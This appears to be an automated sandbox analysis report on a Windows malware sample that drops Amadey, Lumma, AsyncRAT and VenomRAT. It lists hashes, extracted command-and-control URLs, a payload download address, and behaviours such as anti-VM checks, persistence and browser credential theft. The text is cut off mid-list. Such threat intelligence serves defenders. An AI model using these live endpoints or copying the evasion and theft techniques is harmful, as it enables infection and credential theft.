Analysis
-
max time kernel
69s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
15/03/2025, 13:04
Static task
static1
Behavioral task
behavioral1
Sample
b90944a141.exe
Resource
win7-20250207-en
Behavioral task
behavioral2
Sample
b90944a141.exe
Resource
win10v2004-20250313-en
General
-
Target
b90944a141.exe
-
Size
938KB
-
MD5
d7dcdd913bd35547bec8cfcee2bdf4ea
-
SHA1
1494afb246db82becbd7000ed3761315f892673d
-
SHA256
52255ef95a5cfa309e10a6a7ddc22140ca74f399d04097e6d498df078a6c79a2
-
SHA512
ac0745c8fb3b8b074314841b391dcaa060182e52c762dad8207aaa43bb512150ff0b12ecb3d08b8576b208cd14b7b6fa6ecaed04947e647b93318e13c4bfbb29
-
SSDEEP
24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8a0lu:GTvC/MTQYxsWR7a0l
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://zfurrycomp.top/api
https://crosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://htardwarehu.icu/api
https://8cjlaspcorne.icu/api
https://bugildbett.top/api
https://adweaponrywo.digital/api
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://biochextryhub.bet/api
https://q8explorebieology.run/api
https://gadgethgfub.icu/api
https://moderzysics.top/api
https://5ktechmindzs.live/api
https://6codxefusion.top/api
https://7phygcsforum.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://qcitydisco.bet/api
https://cjlaspcorne.icu/api
https://weaponrywo.digital/api
Extracted
asyncrat
| Controller
Default
20.206.204.9:4449
ammmjprqjnqswrieh
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://moderzysics.top/api
https://codxefusion.top/api
Signatures
-
Amadey family
-
Asyncrat family
-
Lumma family
-
resource yara_rule behavioral2/files/0x000a000000024206-2750.dat VenomRAT behavioral2/memory/4736-2762-0x0000000000050000-0x0000000000068000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000024206-2750.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JqGBbm7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ s7MG2VL.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 13 3196 powershell.exe 69 1964 powershell.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
pid Process 2960 powershell.exe 6516 powershell.exe 7020 powershell.exe 1964 powershell.exe 3196 powershell.exe 5304 powershell.exe 4496 powershell.exe 6656 powershell.exe 16660 powershell.exe 2056 powershell.exe 13248 powershell.exe 3200 powershell.exe 1372 powershell.exe 1672 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 13 IoCs
flow pid Process 78 3572 rapes.exe 121 4760 futors.exe 71 3572 rapes.exe 17 3572 rapes.exe 17 3572 rapes.exe 17 3572 rapes.exe 17 3572 rapes.exe 17 3572 rapes.exe 90 4760 futors.exe 90 4760 futors.exe 90 4760 futors.exe 95 3572 rapes.exe 13 3196 powershell.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 7148 msedge.exe 4836 msedge.exe 6180 chrome.exe 2084 chrome.exe 7092 chrome.exe 2940 chrome.exe 6500 chrome.exe 7128 msedge.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion s7MG2VL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion s7MG2VL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE Key value queried \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 31 IoCs
pid Process 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 3572 rapes.exe 2092 a500e4f1ae.exe 4336 a500e4f1ae.exe 5368 JqGBbm7.exe 1220 zY9sqWs.exe 1916 Gxtuum.exe 844 v6Oqdnc.exe 2396 Bthvgkck.exe 1644 HmngBpR.exe 2684 SplashWin.exe 5800 SplashWin.exe 5908 ADFoyxP.exe 2088 amnew.exe 4760 futors.exe 3616 7T7bCyA.exe 4504 trano1221.exe 1868 rapes.exe 4596 futors.exe 3160 s7MG2VL.exe 4464 Gxtuum.exe 4052 trano1221.exe 6524 cronikxqqq.exe 6860 cronikxqqq.exe 6728 cronikxqqq.exe 3584 ZqkKpwG.exe 1992 ZqkKpwG.exe 2624 ZqkKpwG.exe 6632 dw.exe 1748 9JFiKVm.exe 4736 ejrEdhQT0y.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine JqGBbm7.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine s7MG2VL.exe -
Loads dropped DLL 38 IoCs
pid Process 2684 SplashWin.exe 2684 SplashWin.exe 2684 SplashWin.exe 5800 SplashWin.exe 5800 SplashWin.exe 5800 SplashWin.exe 5800 SplashWin.exe 3616 7T7bCyA.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe 4052 trano1221.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 5 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: Bthvgkck.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 285 checkip.amazonaws.com 288 checkip.amazonaws.com 341 ip-api.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 14588 powercfg.exe 14580 powercfg.exe 14572 powercfg.exe 14564 powercfg.exe 3056 powercfg.exe 1820 powercfg.exe 3784 powercfg.exe 5380 powercfg.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000024290-4026.dat autoit_exe behavioral2/files/0x000a00000002420e-4412.dat autoit_exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2396 Bthvgkck.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 3572 rapes.exe 5368 JqGBbm7.exe 844 v6Oqdnc.exe 1868 rapes.exe 3160 s7MG2VL.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2092 set thread context of 4336 2092 a500e4f1ae.exe 96 PID 5800 set thread context of 3076 5800 SplashWin.exe 110 PID 2612 set thread context of 424 2612 sihost.exe 130 PID 6524 set thread context of 6728 6524 cronikxqqq.exe 134 PID 3584 set thread context of 2624 3584 ZqkKpwG.exe 141 PID 1748 set thread context of 2752 1748 9JFiKVm.exe 154 -
resource yara_rule behavioral2/memory/4052-472-0x00007FFDB88D0000-0x00007FFDB8EB9000-memory.dmp upx behavioral2/memory/4052-477-0x00007FFDD7D80000-0x00007FFDD7D8F000-memory.dmp upx behavioral2/memory/4052-476-0x00007FFDCF720000-0x00007FFDCF743000-memory.dmp upx behavioral2/memory/4052-1147-0x00007FFDD30B0000-0x00007FFDD30BD000-memory.dmp upx behavioral2/memory/4052-1134-0x00007FFDCFA10000-0x00007FFDCFA3D000-memory.dmp upx behavioral2/memory/4052-1467-0x00007FFDCEB00000-0x00007FFDCEBCD000-memory.dmp upx behavioral2/memory/4052-1466-0x00007FFDBF420000-0x00007FFDBF940000-memory.dmp upx behavioral2/memory/4052-1465-0x00007FFDCF990000-0x00007FFDCF9C3000-memory.dmp upx behavioral2/memory/4052-1123-0x00007FFDD3110000-0x00007FFDD311D000-memory.dmp upx behavioral2/memory/4052-1097-0x00007FFDD25C0000-0x00007FFDD25D9000-memory.dmp upx behavioral2/memory/4052-2303-0x00007FFDDB560000-0x00007FFDDB572000-memory.dmp upx behavioral2/memory/4052-2302-0x00007FFDCF910000-0x00007FFDCF953000-memory.dmp upx behavioral2/memory/4052-2301-0x00007FFDC2DB0000-0x00007FFDC2ECC000-memory.dmp upx behavioral2/memory/4052-2584-0x00007FFDB88D0000-0x00007FFDB8EB9000-memory.dmp upx behavioral2/memory/4052-2588-0x00007FFDCF500000-0x00007FFDCF52B000-memory.dmp upx behavioral2/memory/4052-2577-0x00007FFDCF890000-0x00007FFDCF8BE000-memory.dmp upx behavioral2/memory/4052-2576-0x00007FFDCBE70000-0x00007FFDCBF2C000-memory.dmp upx behavioral2/memory/4052-2575-0x00007FFDBF1D0000-0x00007FFDBF419000-memory.dmp upx behavioral2/memory/4052-2574-0x00007FFDCF8C0000-0x00007FFDCF8E4000-memory.dmp upx behavioral2/memory/4052-2300-0x00007FFDCF960000-0x00007FFDCF986000-memory.dmp upx behavioral2/memory/4052-2299-0x00007FFDDB580000-0x00007FFDDB58B000-memory.dmp upx behavioral2/memory/4052-2298-0x00007FFDDB590000-0x00007FFDDB5A4000-memory.dmp upx behavioral2/memory/4052-2297-0x00007FFDD5C60000-0x00007FFDD5CE7000-memory.dmp upx behavioral2/memory/4052-2296-0x00007FFDCEA30000-0x00007FFDCEAFF000-memory.dmp upx behavioral2/memory/4052-1144-0x00007FFDCF9D0000-0x00007FFDCFA06000-memory.dmp upx behavioral2/memory/4052-1126-0x00007FFDD1F60000-0x00007FFDD1F79000-memory.dmp upx behavioral2/memory/4052-2646-0x00007FFDB88D0000-0x00007FFDB8EB9000-memory.dmp upx behavioral2/memory/4052-2652-0x00007FFDCF990000-0x00007FFDCF9C3000-memory.dmp upx behavioral2/memory/4052-2670-0x00007FFDCF8C0000-0x00007FFDCF8E4000-memory.dmp upx behavioral2/memory/4052-2673-0x00007FFDCF500000-0x00007FFDCF52B000-memory.dmp upx behavioral2/memory/4052-2672-0x00007FFDCBE70000-0x00007FFDCBF2C000-memory.dmp upx behavioral2/memory/4052-2671-0x00007FFDBF1D0000-0x00007FFDBF419000-memory.dmp upx behavioral2/memory/4052-2669-0x00007FFDDB560000-0x00007FFDDB572000-memory.dmp upx behavioral2/memory/4052-2668-0x00007FFDCF910000-0x00007FFDCF953000-memory.dmp upx behavioral2/memory/4052-2667-0x00007FFDC2DB0000-0x00007FFDC2ECC000-memory.dmp upx behavioral2/memory/4052-2666-0x00007FFDCF960000-0x00007FFDCF986000-memory.dmp upx behavioral2/memory/4052-2665-0x00007FFDDB580000-0x00007FFDDB58B000-memory.dmp upx behavioral2/memory/4052-2664-0x00007FFDDB590000-0x00007FFDDB5A4000-memory.dmp upx behavioral2/memory/4052-2663-0x00007FFDD5C60000-0x00007FFDD5CE7000-memory.dmp upx behavioral2/memory/4052-2662-0x00007FFDCEA30000-0x00007FFDCEAFF000-memory.dmp upx behavioral2/memory/4052-2661-0x00007FFDCEB00000-0x00007FFDCEBCD000-memory.dmp upx behavioral2/memory/4052-2660-0x00007FFDBF420000-0x00007FFDBF940000-memory.dmp upx behavioral2/memory/4052-2651-0x00007FFDCF9D0000-0x00007FFDCFA06000-memory.dmp upx behavioral2/memory/4052-2650-0x00007FFDCFA10000-0x00007FFDCFA3D000-memory.dmp upx behavioral2/memory/4052-2649-0x00007FFDD1F60000-0x00007FFDD1F79000-memory.dmp upx behavioral2/memory/4052-2648-0x00007FFDD7D80000-0x00007FFDD7D8F000-memory.dmp upx behavioral2/memory/4052-2647-0x00007FFDCF720000-0x00007FFDCF743000-memory.dmp upx behavioral2/memory/4052-2645-0x00007FFDD3110000-0x00007FFDD311D000-memory.dmp upx behavioral2/memory/4052-2644-0x00007FFDCF890000-0x00007FFDCF8BE000-memory.dmp upx behavioral2/memory/4052-2643-0x00007FFDD25C0000-0x00007FFDD25D9000-memory.dmp upx behavioral2/memory/4052-2642-0x00007FFDD30B0000-0x00007FFDD30BD000-memory.dmp upx behavioral2/files/0x000a000000024240-3920.dat upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Launches sc.exe 20 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3040 sc.exe 14292 sc.exe 16608 sc.exe 5172 sc.exe 12312 sc.exe 12588 sc.exe 14524 sc.exe 5204 sc.exe 4252 sc.exe 17160 sc.exe 14388 sc.exe 14484 sc.exe 12512 sc.exe 12580 sc.exe 14444 sc.exe 3488 sc.exe 6428 sc.exe 1592 sc.exe 6616 sc.exe 2872 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x00070000000241e2-332.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 7020 6524 WerFault.exe 132 16496 6692 WerFault.exe 334 16488 5184 WerFault.exe 333 16620 6920 WerFault.exe 330 16772 6920 WerFault.exe 330 -
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b90944a141.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a500e4f1ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JqGBbm7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZqkKpwG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s7MG2VL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a500e4f1ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZqkKpwG.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 6692 cmd.exe 2528 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened 